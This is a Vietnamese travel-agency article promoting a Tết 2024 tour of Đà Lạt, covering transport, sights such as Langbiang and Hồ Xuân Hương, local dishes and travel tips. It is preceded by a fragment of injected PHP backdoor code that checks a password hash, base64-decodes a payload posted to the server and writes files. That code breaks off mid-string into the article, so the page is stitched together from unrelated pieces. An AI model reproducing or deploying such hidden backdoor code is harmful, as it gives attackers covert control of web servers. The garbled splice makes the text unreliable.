function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Tour Đà Lạt Tết 2024 khám phá “xứ sở sương mù” xinh như mộng

Tour Đà Lạt Tết 2024 khám phá “xứ sở sương mù” xinh như mộng

24/04/2023 LamThanhHien

Không thể phủ nhận một điều rằng, tour Đà Lạt Tết 2024 luôn có một sức hấp dẫn kỳ lạ đến quý du khách gần xa. Bởi “xứ sở sương mù” may mắn sở hữu kiểu thời tiết chiều lòng người, bốn mùa muôn hoa khoe sắc thắm. Hơn thế nữa, nhiều du khách tour Đà Lạt Tết 2024 còn ưu ái đặt cho vùng đất này biệt danh là “Paris thu nhỏ” với rất nhiều điểm đến thú vị. Cùng Đi để đến xem thử Đà Lạt có thực sự đẹp như lời đồn không nhé!

TỔNG QUAN VỀ “THÀNH PHỐ NGÀN HOA” – ĐÀ LẠT

Đà Lạt được nhận định là một trong những địa điểm hot nhất nhì tại khu vực vùng Tây Nguyên đại ngàn. Đà Lạt là thành phố trực thuộc của tỉnh Lâm Đồng, nằm trên cao nguyên Lâm Viên, tỉnh Lâm Đồng. Mỗi khi nhắc đến thành phố Đà Lạt, chúng ta sẽ nghĩ ngay đến một thành phố với vẻ đẹp độc đáo, kết hợp giữa nét cổ kính truyền thống pha lẫn cùng với nét hiện đại nổi bật.

Tour Đà Lạt Tết 2024 - Tổng quan về Đà Lạt

Đà Lạt là thành phố trực thuộc của tỉnh Lâm Đồng, nằm trên cao nguyên Lâm Viên, tỉnh Lâm Đồng

Một điều mà chắc chắn du khách tour Đà Lạt Tết 2024 sẽ rất thích đó chính là thời tiết quanh năm dịu dàng, không quá nóng mà cũng không quá lạnh. Rất thích hợp để tổ chức những chuyến đi vào những ngày đầu năm mới.

Bên cạnh đó, thành phố này còn “níu chân” nhiều du khách bởi tính tình hiền hòa, hiếu khách của người Đà Lạt. Bởi Đà Lạt là một vùng đất trải qua biết bao thăng trầm, với lịch sử hình thành và phát triển có sự góp mặt của cộng đồng nhiều dân tộc. Trong tiến trình đó, họ đã xây dựng nên một nền văn hóa cực đa dạng và đặc sắc, mang màu sắc của riêng người Đà Lạt mà du khách tour Đà Lạt Tết 2024 có thể trải nghiệm.

>>>Xem thêm: Kinh nghiệm đi tour Hà Nội Nha Trang Đà Lạt mới nhất 2023

NÊN ĐI TOUR ĐÀ LẠT TẾT 2024 BẰNG PHƯƠNG TIỆN GÌ?

1. Di chuyển bằng máy bay

Hiện nay, từ TPHCM và Hà Nội đều có các chuyến bay đến Đà Lạt hàng ngày với tần suất từ 3 – 4 chuyến/ngày. Được khai thác bởi một số hãng hàng không như: Vietnam Airlines, Bamboo Airways, Vietjet,… Thời gian bay từ TPHCM và Hà Nội đến Đà Lạt lần lượt là 30 phút và 2 tiếng.

Hầu như, ngày nào cũng có chuyến bay đến Đà Lạt. Do đó quý khách đi tour Đà Lạt Tết 2024 không cần phải lo lắng về việc không có chuyến bay phù hợp với lịch cá nhân của mình. Nếu du khách đã có kế hoạch đi tour Đà Lạt Tết 2024 thì nên đặt vé máy bay sớm để có giá tốt, tốt nhất là từ 1 – 2 tháng. Đặt vé cận ngày giá vé sẽ tăng cao hơn so với đặt sớm.

2. Di chuyển từ xe khách

Quãng đường từ TPHCM đến Đà Lạt khoảng 307km, do đó du khách tour Đà Lạt Tết 2024 có thể mất từ 7 đến 8 tiếng để di chuyển. Bạn có thể di chuyển bằng xe giường nằm hoặc xe limousine tùy vào nhu cầu của quý khách. Bạn chỉ cần chợp mắt một chút là có thể đến với thành phố Đà Lạt mộng mơ.

>>>Xem thêm: Tour Phan Thiết Đà Lạt 4 ngày 3 đêm: Những điều cần biết

CÁC ĐỊA ĐIỂM MÀ DU KHÁCH TOUR ĐÀ LẠT TẾT 2024 NÊN ĐẾN

1. Núi Langbiang

Nếu bạn là một người yêu thích loại hình du lịch dã ngoại, hòa mình cùng với thiên nhiên thì núi Langbiang là một sự lựa chọn hoàn hảo cho chuyến tour Đà Lạt Tết 2024 của bạn. Núi Langbiang được xem như là “trái tim xanh” của thành phố Đà Lạt, nơi đây thường thu hút các bạn trẻ đam mê phượt và thám hiểm đến trải nghiệm.

Tour Đà Lạt Tết 2024 - Núi Langbiang Đà Lạt

Núi Langbiang được xem như là “trái tim xanh” của thành phố Đà Lạt, nơi đây thường thu hút các bạn trẻ đam mê phượt và thám hiểm đến trải nghiệm

Đây là “ngôi nhà chung” của rất nhiều loại dược thảo và chim quý hiếm. Tại Khu du lịch Langbiang, du khách tour Đà Lạt Tết 2024 có thể tổ chức các hoạt động như tham quan, leo núi, chơi dù lượn hoặc cắm trại đều cực kỳ thú vị.

Ngoài ra, tại khu vực đồi Radar du khách tour Đà Lạt Tết 2024 có thể thuê xe jeep hoặc trekking để lên đến đỉnh đồi. Trên đỉnh đồi có rất nhiều hoạt động vui chơi và các địa điểm để bạn có thể chill như: Vườn hoa, cây cảnh, quán cà phê,…

2. Đường Hầm Điêu Khắc

Đường hầm điêu khắc hay còn có cái tên khác là đường hầm đất sét. Đây là một trong những địa điểm hot nhất dạo gần đây và nằm trong top địa điểm du lịch du khách tour Đà Lạt Tết 2024 không nên bỏ qua. Đây là đường hầm dài nhất trên thế giới được làm hoàn toàn bằng đất sét, trong đó có một số công trình đã đạt kỷ lục quốc gia.

Tour Đà Lạt Tết 2024 - Đường hầm điêu khắc

Đường hầm điêu khắc là một trong những địa điểm hot nhất dạo gần đây và nằm trong top địa điểm du lịch du khách tour Đà Lạt Tết 2024 không nên bỏ qua

Khi đến tham quan đường hầm đất sét, du khách tour Đà Lạt Tết 2024 sẽ sẽ bị choáng ngợp bởi những gì mà cảnh quan nơi đây để lại. Những khối đất sét tưởng chừng như vô tri vô giác, không có hình hài gì cả nhưng khi đã qua đôi bàn tay của các nghệ nhân thì nó dường như được “sống dậy”.

Kiến trúc của đường hầm đất sét mang một phong cách rất độc đáo và cực kỳ bắt mắt. Từ những khối đất sét thô sơ, các nghệ nhân có chuyên môn đã tái hiện thành công hình ảnh một Đà Lạt từ thời khai hoang đến một Đà Lạt thu hút khách du lịch tour Đà lạt Tết 2024 như hiện nay.

>>>Xem thêm: Tour Đà Nẵng Đà Lạt 3 ngày 2 đêm: Những điều cần biết

3. Vùng Đất Cổ Tích – Fairytale Land Đà Lạt

Được lấy nguồn cảm hứng từ ngôi làng Hobbit tại New Zealand, Fairytale Land Đà Lạt đã thành công trong việc khơi gợi về những câu chuyện cổ tích trong tâm trí mỗi du khách tour Đà Lạt Tết 2024. Tuy địa điểm này khá mới mẻ, nhưng nó cũng đã để lại những dấu ấn nhất định và là một địa điểm rất đáng để trải nghiệm trong tour Đà Lạt Tết 2024 của bạn.

Tour Đà Lạt Tết 2024 - Fairytale Land Đà Lạt

Tại khu vườn cổ tích Fairytale Land có rất nhiều những ngôi nhà mang phong cách cổ điển, siêu đẹp

Tại khu vườn cổ tích Fairytale Land có rất nhiều những ngôi nhà mang phong cách cổ điển, siêu đẹp. Đó là những cửa tiệm của những nhân vật nổi tiếng như: tiệm trà Black Baron – được biết đến là một phi công tài cao, tiệm đồ handmade của Ngài Mason, tiệm làm đẹp của cô nương Kate, nhà chủ quán rượu – tại đây du khách tour Đà Lạt Tết 2024 có thể nếm thử từng loại rượu mà bạn muốn,….

Bên cạnh đó, từng ngôi nhà tại khu vườn Fairytale Land đều mang một câu chuyện cổ tích đặc sắc và hấp dẫn. Ngoài ra thì đến đây du khách tour Đà Lạt Tết 2024 có thể nếm thử các loại trà, rượu vang Vĩnh Tiến là những đặc sản của Đà Lạt sẽ được truyền tải trong giấc mơ cổ tích của quý khách.

4. Nhà Thờ Domaine De Marie Đà Lạt

Nhà thờ Domaine De Marie Đà Lạt nổi tiếng từ lâu bởi sở hữu một màu hồng đặc trưng không lẫn đi đâu được. Nhà thờ Domaine De Marie là một trong ba nhà thờ nổi tiếng nhất tại “xứ sở sương mù” Đà Lạt. Ngoài cái tên Nhà thờ Domaine De Marie như du khách tour Đà Lạt Tết 2024 thường nghe đến, thì nhà thờ này còn có tên khác là nhà thờ Mai Anh hoặc Vinh Sơn.

Tour Đà Lạt Tết 2024 - Nhà Thờ Domaine De Marie Đà Lạt

Nhà thờ Domaine De Marie Đà Lạt nổi tiếng từ lâu bởi sở hữu một màu hồng đặc trưng không lẫn đi đâu được

Nhà thờ Domaine De Marie được thiết kế theo lối kiến trúc của Pháp cổ, chính thức khởi công xây dựng vào năm 1940. Nhà thờ tọa lạc ngay trung tâm thành phố, du khách tour Đà Lạt Tết 2024 có thể đến tham quan nhà thờ bất cứ lúc nào. Tuy nhiên, Đi để đến khuyên bạn nên đi vào lúc 7-11 giờ sáng hoặc 14-17 giờ chiều để tránh ảnh hướng đến các hoạt động của nhà thờ.

Do nơi đây vốn là “miền đất lành” cho các loài hoa sinh trưởng, đặc biệt là hoa hải tiên nên có rất nhiều du khách tìm đến đây để check-in. Tuy nhiên, nếu có ghé thăm Nhà thờ Domaine De Marie, du khách tour Đà Lạt Tết 2024 lưu ý nên tuân thủ đúng quy định của nhà thờ. Tuyệt đối, không hái hoa, giẫm đạp lên những chỗ cấm để bảo vệ cảnh quan của nhà thờ.

>>>Xem thêm: Các tips phối trang phục du lịch Đà Lạt theo mùa cực trendy

5. Thác Prenn

Cao nguyên Lâm Viên từ lâu đã nổi tiếng với các ngọn thác hùng vĩ từ hàng trăm năm trước. Mỗi một ngọn thác ở đây đều mang một màu sắc và vẻ đẹp riêng. Nhưng tất cả đều có một điểm chúng đó chính là đều có quy mô rất lớn và tuôn đổ ngày đêm không ngơi nghỉ. Sự xanh mát của thác Prenn, và thiên nhiên trong lành xung quanh thác chắc chắn sẽ mang lại sự dễ chịu và thoải mái cho du khách tour Đà Lạt Tết 2024.

Tour Đà Lạt Tết 2024 - Thác Prenn

Sự xanh mát của thác Prenn, và thiên nhiên trong lành xung quanh thác chắc chắn sẽ mang lại sự dễ chịu và thoải mái cho du khách tour Đà Lạt Tết 2024

Thác Prenn là một ngọn thác tuyệt đẹp nằm trên cánh rừng nguyên sinh còn sót lại ở Đà Lạt, nằm ngay dưới chân đèo Prenn. Thác Prenn khởi nguồn từ suối Prenn ở Đà Lạt, sau đó chảy qua đèo Prenn đến khi gặp khúc gãy của nền đá granite thì trở thành thác. Thác Prenn có chiều cao là 10 mét và rộng 20 mét, thác Prenn đổ xuống như một dải lụa trắng siêu đẹp, có thể vì lẽ đó mà nó còn có tên gọi khác là thác Tiên Sa.

Đến với thác Prenn, du khách tour Đà Lạt Tết 2024 không chỉ đơn giản được thưởng thức cảnh đẹp mà còn có cơ hội tham gia hàng loạt các hoạt động thú vị khác. Một số các hoạt động có tại thác Prenn như là: Chèo thuyền phao trên suối, cáp treo, băng rừng bằng xe Jeep, viếng đền Âu Lạc, tham quan vườn thú,…

6. Chùa Linh Ẩn

Chùa Linh Ẩn Đà Lạt là chốn cầu nguyện linh thiêng và là nơi tham quan lý tưởng vào dịp đầu năm mới mà du khách tour Đà Lạt Tết 2024 nên đến. Chùa Linh Ẩn được xây dựng trên một khu đất cao 3000 mét và tọa lạc giữa miền sơn cước càng làm tăng thêm nét độc đáo và linh thiêng cho nhà chùa.

Tour Đà Lạt Tết 2024 - Chùa Linh Ẩn

Chùa Linh Ẩn Đà Lạt là chốn cầu nguyện linh thiêng và là nơi tham quan lý tưởng vào dịp đầu năm mới mà du khách tour Đà Lạt Tết 2024

Chùa Linh Ẩn nằm ngay bên cạnh Thác Voi hùng vĩ, nơi bạn có thể cảm nhận được sự giao hòa của sự trang nghiêm của ngôi chùa và sự trong lành của thiên nhiên. Chùa Linh Ẩn được hoàn thành vào năm 1993 bởi thầy Thích Tâm Vị, ban đầu ngôi chùa chỉ là ngôi Niệm Phật Đường có diện tích vỏn vẹn 4 hecta.

Do ngày càng có nhiều du khách đến hành hương cho nên chùa đã được mở rộng ra vào năm 1999. Khi hoàn thanh chùa có tên là Linh Ẩn tự cho đến ngày nay. Đây là một địa điểm tâm linh rất đáng để du khách tour Đà Lạt Tết 2024 đến tham quan và chiêm bái trong chuyến du lịch của mình.

>>>Xem thêm: Tour Đà Lạt máy bay giá rẻ mới nhất 2023

7. Đồi Ronbin Đà Lạt 

Đồi Ronbin Đà lạt hay còn được gọi là đồi Ronbin cáp treo, tạo lạc trên trục đường đèo Prenn huyền thoại. Đây được xem như là địa điểm ngắm cảnh hoàn hảo nhất thành phố với cáp treo có chiều dài lên đến 2,2km, xuyên qua những đồi thông bạt ngàn. Du khách tour Đà Lạt Tết 2024 thường không quên ghé đồi Robin để trải nghiệm và tham quan, thưởng ngoạn cảnh sắc Đà Lạt từ trên cao.

Tour Đà Lạt Tết 2024 - Đồi Ronbin Đà Lạt 

Đồi Ronbin Đà Lạt được xem như là địa điểm ngắm cảnh hoàn hảo nhất thành phố với cáp treo có chiều dài lên đến 2,2km

Trước năm 1975, vị trí của đồi Robin hiện nay được xây dựng lên như là một pháo đài trận địa Tân Lạc. Đây là hệ thống phỏng thủ của lực lượng ta trong cuộc kháng chiến chống đến quốc Mỹ xâm lược. Khi hòa bình lập lại, nơi đây được sửa sang và cải tạo lại để thành lập công trình cáp treo đầu tiên của thành phố Đà Lạt. 

Ngày nay, đồi Robin Đà Lạt đã trở thành một điểm đến thu hút khách du lịch bậc nhất tại Đà Lạt. Đứng tại đỉnh đồi, du khách tour Đà Lạt Tết 2024 sẽ xuýt xoa trước khung cảnh tuyệt đẹp của thành phó cùng những mảng xanh “mướt mắt” của rừng thông trải dài sẽ làm bạn cảm thấy thích thú. 

8. Hồ Xuân Hương 

Hồ Xuân Hương được nhiều người đánh giá là hồ nước đẹp không chỉ riêng Đà Lạt mà đẹp nhất Việt Nam. Hồ Xuân Hương mang trong mình một phong cách lãng mạn với sự bao phủ của các mảng xanh của cây cối và công viên đầy hoa thơm cỏ lạ. Và từ đó, chính nhờ sự lãng mạn này mà hồ nước nổi tiếng này đã đi vào rất nhiều bài văn, bài thơ của những cây bút nổi tiếng. 

Tour Đà Lạt Tết 2024 - Hồ Xuân Hương 

Hồ nước mang trong mình một phong cách lãng mạn với sự bao phủ của các mảng xanh của cây cối và công viên đầy hoa thơm cỏ lạ

Khi du khách đi tour Đà Lạt Tết 2024 thì bạn sẽ có thể “tận mục sở thị” được các sắc hồng rực rỡ của những đóa hoa anh đào đang vào mùa khoe sắc thắm, cùng với một chút se lạnh của ngày đầu năm mới. Tất cả sẽ tạo thành một không gian cực kỳ thanh bình và nên thơ. 

Thời điểm vàng của hồ Xuân Hương là lúc hoàng hôn dần buông xuống mặt hồ, lúc này hồ nước như khoác lên mình một chiếc áo nhuốm màu huyền ảo của buổi chiều rực lửa. Khi đến với nơi đây, du khách tour Đà Lạt Tết 2024 như được thả hồn mình vào một bức tranh được vẽ lên bởi thiên nhiên kỳ vĩ, đầy sống động và không hề đơn sắc. 

>>>Xem thêm: Cẩm nang du lịch bụi Đà Lạt dành cho bạn trẻ đam mê khám phá

ĂN GÌ TRONG TOUR ĐÀ LẠT TẾT 2024?

1. Bánh Ướt Lòng Gà

Món bánh ướt lòng gà trở nên đặc biệt và hợp lý hơn bao giờ hết bởi sự sáng tạo của người dân Đà Lạt. Hai nguyên liệu này tưởng không hợp mà lại hóa ra “hợp không tưởng”. Bánh ướt có độ dẻo dai nhất định, lòng gà có vị thơm ngon giòn giòn kết hợp với nước chấm chua ngọt, với rau thơm, giá sẽ khiến biết bao du khách tour Đà Lạt Tết 2024 mê mẩn cho mà xem.

Tour Đà Lạt Tết 2024 - Món bánh ướt lòng gà

Món bánh ướt lòng gà trở nên đặc biệt và hợp lý hơn bao giờ hết bởi sự sáng tạo của người dân Đà Lạt

Kỳ thực thì món bánh ướt lòng gà có cách chế biến không mấy phức tạp. Nhưng đối với người Đà Lạt chính sự đơn giản như vậy đã làm nên tính độc đáo cho món ăn này. Món ăn này thơm ngon là bởi vì các nguyên liệu đã được chuẩn bị một cách tỉ mỉ và chu đáo.

Gạo tẻ để làm bánh ướt phải là loại gạo ngon thì bánh mới có mùi thơm đặc trưng. Gạo được đem đi ngâm, xay rồi trộn với bột năng để bột có độ sệt nhất định. Tiếp đến là bột mì và nước theo tỉ lệ được cân đo rõ ràng để bánh có độ dai vừa phải và không bị bể. 

Món bánh ướt lòng gà mang một hương vị tuy lạ mà quen. Đến với tour Đà Lạt Tết 2024, bạn hãy thử ghé qua các quán ăn bên khu Hòa Bình, chắc chắn bạn sẽ bắt gặp các hàng bán bánh ướt lòng gà ưng ý, ngon tuyệt. Đây là điều mà có lẽ các nhà hàng nổi tiếng chưa chắc sẽ mang đến một hương vị đặc biệt như vậy. 

2. Bánh Căn Đà Lạt

Bánh căn là một món ăn mà du khách tour Đà Lạt Tết 2024 có thể thấy người ta bán rộng rãi trên khắp các phố phường Đà Lạt. Bánh căn Đà lạt được bắt nguồn từ miền Duyên hải Nam Trung Bộ và phát triển mạnh mẽ ở Đà Lạt.

Tour Đà Lạt Tết 2024 - Bánh Căn Đà Lạt

Nhiều du khách coi bánh căn là đặc sản của Đà Lạt, vì sự thật du khách tour Đà Lạt Tết 2024 đi đến đâu cũng sẽ thấy người ta bày bán loại bánh này

Nguyên liệu chính để làm lên món bánh căn là bột gạo, một xíu muối để bánh có vị. Bột sẽ được đổ vào một cái khuôn đất nung, người ta sẽ bán theo 1 cặp và gộp lại. Nhân bánh thì khá đa dạng, nhân truyền thống thì là trứng cút hoặc trứng gà, sau này được phát triển thêm một số loại nhân nữa như: Hải sản, thịt để có nhiều sự lựa chọn hơn.

Nhiều du khách coi bánh căn là đặc sản của Đà Lạt, vì sự thật du khách tour Đà Lạt Tết 2024 đi đến đâu cũng sẽ thấy người ta bày bán loại bánh này. Đây dường như là một món ăn mang “linh hồn” của Đà Lạt. Tiết trời Đà Lạt lành lạnh được ngồi bên bếp lửa ấm nóng, thưởng thức những chiếc bánh thơm ngon và trò chuyện cùng cô bán hàng thì chẳng có gì bằng.

>>>Xem thêm: Tour Đà Lạt 3 ngày 3 đêm – “Ngất ngây” trước vẻ đẹp mộng mơ

3. Bánh Mì Xíu Mại

Đã nhắc đến đặc sản của ẩm thực “xứ sở ngàn hoa” thì thật là một thiếu sót nếu bỏ qua món bánh mì xíu mại. Bánh mì thì chắc hẳn không còn xa lạ gì với người Việt Nam, nhưng còn có một món bánh mì được ăn kèm với một loại nước sốt “thần thánh” đó là xíu mại.

Tour Đà Lạt Tết 2024 - Bánh Mì Xíu Mại

Đã nhắc đến đặc sản của ẩm thực “xứ sở ngàn hoa” thì thật là một thiếu sót nếu bỏ qua món bánh mì xíu mại

Trên thực tế, món bánh mì xíu mại có nguồn gốc từ Trung Quốc, đó là những viên thịt nạc cùng với mỡ heo xay nhuyễn rồi von tròn chúng lại nấu với cà chua tạo thành xíu mại. Khác với món bánh mì xíu mại ở Sài Gòn, xíu mại ở Đà Lạt mang hương vị hơi cay cay đặc trưng của Tây Nguyên.

Ở Đà Lạt, món xíu mại nổi tiếng nhờ sự cầu kỳ và công phu trong cách chế biến. Trong chén nước dùng, du khách tour Đà Lạt Tết 2024 sẽ thấy những viên xíu mại được thả nổi trên mặt nước, cùng vài miếng chả lụa và da heo giòn giòn ăn rất vui miệng.

4. Kem Bơ Đà Lạt

Trong danh sách những món ăn ngon mang đậm nét đặc trưng của Đà Lạt thì không thể không nhắc đến món kem bơ. Nói kem bơ là nét đặc trưng của Đà Lạt là vì cũng từng ấy nguyên liệu nhưng thường thức ở đâu cũng thấy không ngon bằng ăn ở Đà Lạt.

Tour Đà Lạt Tết 2024 - Kem Bơ Đà Lạt

Nhiều du khách truyền tai nhau rằng đã đặt chân đến Đà Lạt mà chưa thưởng thức quà món kem bơ thì coi như là chưa đến Đà Lạt

Món kem bơ được hòa quyện giữa vị beo béo của bơ, hương thơm đặc biệt của sầu riêng. Kèm với đó là một chút béo thơm của dừa sợi và bùi bùi của đậu phộng. Tất cả cùng làm nên một “bữa tiệc” vị giác hoành tráng.

Nhiều du khách truyền tai nhau rằng đã đặt chân đến Đà Lạt mà chưa thưởng thức quà món kem bơ thì coi như là chưa đến Đà Lạt. Cũng chính vì như vậy du khách tour Đà Lạt Tết 2024 nên thử một lần nếu có cơ hội đến Đà Lạt nhé!

>>>Xem thêm: “Unbox” tour Đà Lạt 5 ngày 4 đêm siêu chi tiết!

5. Lẩu Gà Lá É

Lẩu gà lá é là một món ăn ngon ở Đà Lạt, nước lẩu có vị chua chua từ lá é và thịt gà chắc trong từng thớ thịt. Lá é thuộc họ của rau húng quế, nếu ăn sống thì hơi bị khó ăn, nhưng nếu cho vào lẩu nấu ăn chung thì có hương vị rất ngon.

Tour Đà Lạt Tết 2024 - Lẩu Gà Lá É

Thật tuyệt vời khi tiết trời se se lạnh, được quây quần bên cạnh những người thân và bạn bè thưởng thức một nồi lẩu gà lá é nóng hổi

Thật tuyệt vời khi tiết trời se se lạnh, được quây quần bên cạnh những người thân và bạn bè thưởng thức một nồi lẩu gà lá é nóng hổi. Du khách tour Đà Lạt Tết 2024 sẽ cảm nhận được vị chua chua của lá é và vị cay cay của ớt cùng rau mùi làm “tan chảy” con tim của biết bao du khách.

NHỮNG LƯU Ý KHI ĐI TOUR ĐÀ LẠT TẾT 2024

  • Vào ban đêm thời tiết khá lạnh, du khách tour Đà Lạt Tết 2024 nên mang theo áo để giữ ấm hoặc có thêm khăn choàng cổ càng tốt để tránh bị cảm lạnh. Đặc biệt, trời có thể mưa nắng đột ngột nên bạn hãy tự trang bị thêm cho mình ô, nón để che mưa nắng một cách tốt nhất.
  • Hãy chuẩn bị một đôi giày thật êm ái để giúp bạn di chuyển dễ dàng hơn với địa hình Đà Lạt.
  • Trước khi mua các đặc sản, quà lưu niệm tại các khu chợ hoặc các khu du lịch, du khách tour Đà Lạt Tết 2024 nên tham khảo giá trước khi mua để tránh tình trạng bị chặt chém như dịp đầu năm mới.
  • Nếu có ý định thuê xe, bạn hãy mang theo bằng lái xe và cẩn thận tay lái nhé.

>>>Xem thêm: Tour Đà Lạt 2 ngày 2 đêm: Khám phá thành phố mộng mơ

Với kinh nghiệm du lịch tour Đà Lạt Tết 2024 của Đi để đến cực chi tiết. Hy vọng du khách sẽ có một sự chuẩn bị thật tốt và có những giây phút ý nghĩa, thoải mái tại “xứ sở ngàn hoa” nhân dịp đầu năm mới. Nếu quý khách tour Đà Lạt Tết 2024 cần thêm bất kỳ thông tin gì liên quan đến chuyến đi hoặc tư vấn tour du lịch miễn phí. Bạn vui lòng liên hệ hotline: 1900 3398 để được giải đáp.

ĐĂNG KÍ TƯ VẤN TOUR ĐÀ LẠT TẾT 2024

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]